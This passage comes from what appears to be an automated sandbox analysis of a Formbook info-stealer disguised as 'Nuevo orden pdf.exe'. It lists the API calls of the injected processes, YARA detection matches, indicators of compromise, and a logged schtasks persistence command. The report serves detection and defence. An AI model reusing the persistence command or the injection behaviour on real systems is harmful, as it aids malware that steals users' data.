            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00419F3A NtCreateFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00419FEB NtReadFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F598F0 NtReadVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F59860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F59840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F599A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F59910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F59A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F59A20 NtResumeThread,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F59A00 NtProtectVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F595D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F59540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F596E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F59660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F597A0 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F59780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F59710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F598A0 NtWriteVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F5B040 NtSuspendThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F59820 NtEnumerateKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F599D0 NtCreateProcessEx,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F59950 NtQueueApcThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F59A80 NtOpenDirectoryObject,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F59A10 NtQuerySection,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F5A3B0 NtGetContextThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F59B00 NtSetValueKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F595F0 NtQueryInformationFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F59560 NtWriteFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F5AD30 NtSetContextThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F59520 NtWaitForSingleObject,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F596D0 NtCreateKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F59670 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F59650 NtQueryValueKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F59610 NtEnumerateValueKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F59FE0 NtCreateMutant,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F59770 NtSetInformationFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F5A770 NtOpenThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F59760 NtOpenProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F59730 NtQueryVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F5A710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA9840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA9860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA95D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA99A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA9540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA96D0 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA96E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA9650 NtQueryValueKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA9A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA9660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA9FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA9780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA9710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA98F0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA98A0 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DAB040 NtSuspendThread,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA9820 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA99D0 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA95F0 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA9950 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA9560 NtWriteFile,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DAAD30 NtSetContextThread,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA9520 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA9A80 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA9670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA9610 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA9A10 NtQuerySection,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA9A00 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA9A20 NtResumeThread,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DAA3B0 NtGetContextThread,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA97A0 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA9770 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DAA770 NtOpenThread,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA9760 NtOpenProcess,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DAA710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA9B00 NtSetValueKey,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA9730 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_00E1A070 NtClose,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_00E1A120 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_00E19FF0 NtReadFile,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_00E19F40 NtCreateFile,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_00E1A09A NtReadFile,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_00E1A11A NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_00E19FEB NtReadFile,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_00E19F3A NtCreateFile,
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeCode function: 0_2_008CA1D3
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeCode function: 0_2_012FC2B0
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeCode function: 0_2_012F9990
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeCode function: 0_2_008CA42F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00401030
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041E1F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041D183
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041D186
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041E45A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041DDD1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00402D90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00409E40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00409E3C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00402FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE28EC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F420A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE20A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F2B090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FEE824
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FD1002
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F34120
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F1F900
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE22AE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FDDBD2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F4EBB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE2B28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FDD466
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F2841F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F2D5E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE25DD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F42581
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE1D55
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F10D20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE2D07
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE2EF7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F36E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FDD616
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE1FF1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FEDFCE
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D7B090
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E320A8
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D920A0
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D7841F
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E21002
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D7D5E0
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D92581
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E31D55
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D6F900
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E32D07
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D60D20
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D84120
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E32EF7
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E322AE
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D86E30
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E31FF1
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D9EBB0
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E32B28
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_00E1E1F9
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_00E1D183
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_00E1D186
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_00E1E45A
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_00E1DDD1
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_00E02D90
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_00E09E40
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_00E09E3C
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_00E02FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00F1B150 appears 35 times
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 04D6B150 appears 35 times
            Source: Nuevo orden pdf.exe, 00000000.00000002.234863690.000000000C360000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs Nuevo orden pdf.exe
            Source: Nuevo orden pdf.exe, 00000000.00000002.228288277.0000000001060000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Nuevo orden pdf.exe
            Source: Nuevo orden pdf.exe, 00000000.00000002.227705180.00000000009A0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSize.exe> vs Nuevo orden pdf.exe
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSimpleUI.dll( vs Nuevo orden pdf.exe
            Source: Nuevo orden pdf.exe, 00000000.00000002.235277378.000000000C460000.00000002.00000001.sdmpBinary or memory string: originalfilename vs Nuevo orden pdf.exe
            Source: Nuevo orden pdf.exe, 00000000.00000002.235277378.000000000C460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs Nuevo orden pdf.exe
            Source: Nuevo orden pdf.exeBinary or memory string: OriginalFilenameSize.exe> vs Nuevo orden pdf.exe
            Source: Nuevo orden pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 0000000B.00000002.480288139.0000000000E00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000B.00000002.480288139.0000000000E00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.271343185.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.271343185.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000B.00000002.483002264.0000000004B00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000B.00000002.483002264.0000000004B00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000B.00000002.482531961.00000000049A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000B.00000002.482531961.00000000049A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.230107043.0000000003E39000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.230107043.0000000003E39000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.271322606.0000000000900000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.271322606.0000000000900000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.271211976.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.271211976.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.Nuevo orden pdf.exe.3ed69a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.Nuevo orden pdf.exe.3ed69a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: Nuevo orden pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: NkwKQPLeekw.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.troj.evad.winEXE@10/4@3/4
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeFile created: C:\Users\user\AppData\Roaming\NkwKQPLeekw.exeJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6156:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6784:120:WilError_01
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeMutant created: \Sessions\1\BaseNamedObjects\pYJofVrxAAcJK
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeFile created: C:\Users\user\AppData\Local\Temp\tmpA401.tmpJump to behavior
            Source: Nuevo orden pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeFile read: C:\Users\user\Desktop\Nuevo orden pdf.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Nuevo orden pdf.exe 'C:\Users\user\Desktop\Nuevo orden pdf.exe'
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\NkwKQPLeekw' /XML 'C:\Users\user\AppData\Local\Temp\tmpA401.tmp'
